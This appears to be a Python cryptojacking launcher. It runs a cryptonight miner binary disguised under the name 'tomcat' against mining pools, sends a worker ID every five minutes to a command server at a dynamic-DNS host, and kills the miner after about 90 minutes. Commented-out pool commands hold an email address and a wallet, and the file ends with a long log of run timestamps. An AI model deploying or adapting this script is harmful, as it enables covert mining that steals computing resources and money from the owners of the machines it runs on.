import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:44:03.475243
#2018-02-17 16:32:04.373951
#2018-02-17 18:19:01.796401
#2018-02-17 20:07:04.255047
#2018-02-17 21:54:06.052869
#2018-02-17 23:39:06.131397
#2018-02-18 01:28:07.878170
#2018-02-18 03:15:08.301909
#2018-02-18 05:05:07.096872
#2018-02-18 06:57:05.621149
#2018-02-18 08:45:07.573168
#2018-02-18 10:32:07.737529
#2018-02-18 12:17:05.565729
#2018-02-18 14:04:06.284539
#2018-02-18 15:54:05.178227
#2018-02-18 17:45:08.662651
#2018-02-18 19:32:05.645218
#2018-02-18 21:17:06.847231
#2018-02-18 23:06:05.655017
#2018-02-19 00:53:07.376853
#2018-02-19 02:40:06.211604
#2018-02-19 04:27:07.597683
#2018-02-19 06:12:06.707416
#2018-02-19 07:59:01.326345
#2018-02-19 09:50:08.730991
#2018-02-19 11:40:04.855550
#2018-02-19 13:28:07.877173
#2018-02-19 15:18:02.093814
#2018-02-19 17:06:06.646630
#2018-02-19 18:53:01.563648
#2018-02-19 20:41:06.495935
#2018-02-19 22:28:07.646500
#2018-02-20 00:14:05.596912
#2018-02-20 02:02:01.989858
#2018-02-20 03:52:03.884092
#2018-02-20 05:37:01.512753
#2018-02-20 07:22:04.683324
#2018-02-20 09:08:01.453243
#2018-02-20 10:50:11.165005
#2018-02-20 12:37:05.732629
#2018-02-20 14:22:05.174655
#2018-02-20 16:07:01.823344
#2018-02-20 17:52:01.549972
#2018-02-20 19:44:08.938147
#2018-02-20 21:34:05.681652
#2018-02-20 23:16:07.273905
#2018-02-21 01:02:02.151419
#2018-02-21 02:49:06.794447
#2018-02-21 04:38:06.531187
#2018-02-21 06:26:01.981271
#2018-02-21 08:10:04.162873
#2018-02-21 09:57:08.429282
#2018-02-21 11:46:06.192276
#2018-02-21 13:37:09.209648
#2018-02-21 15:21:08.572081
#2018-02-21 17:12:09.667245
#2018-02-21 19:01:06.316331
#2018-02-21 20:50:04.222045
#2018-02-21 22:34:06.106314
#2018-02-22 00:24:04.189121
#2018-02-22 02:11:03.724269
#2018-02-22 03:57:04.720250
#2018-02-22 05:44:05.769657
#2018-02-22 07:29:04.786944
#2018-02-22 09:17:01.575505
#2018-02-22 11:04:08.394367
#2018-02-22 12:51:05.558142
#2018-02-22 14:37:01.967102
#2018-02-22 16:22:01.920326
#2018-02-22 18:08:07.534430
#2018-02-22 19:57:04.480527
#2018-02-22 21:48:01.835336
#2018-02-22 23:34:05.967050
#2018-02-23 01:22:01.691215
#2018-02-23 03:07:08.180667
#2018-02-23 04:55:01.575699
#2018-02-23 06:41:02.175661
#2018-02-23 08:31:04.561766
#2018-02-23 10:45:10.153505
#2018-02-23 12:42:10.675327
#2018-02-23 14:25:07.145669
#2018-02-23 16:16:05.843167
#2018-02-23 18:03:08.690582
#2018-02-23 19:48:04.413581
#2018-02-23 21:32:04.771492
#2018-02-23 23:20:07.466802
#2018-02-24 01:12:05.378211
#2018-02-24 03:04:04.113975
#2018-02-24 04:50:08.622018
#2018-02-24 06:28:07.544037
#2018-02-24 08:17:01.911962
#2018-02-24 10:01:04.111411
#2018-02-24 11:59:04.065844
#2018-02-24 13:46:03.961408
#2018-02-24 15:34:06.038481
#2018-02-24 17:31:01.278311
#2018-02-24 19:17:03.636189
#2018-02-24 21:04:05.657622
#2018-02-24 23:38:06.487182
#2018-02-25 03:43:04.387825
#2018-02-25 07:28:05.510847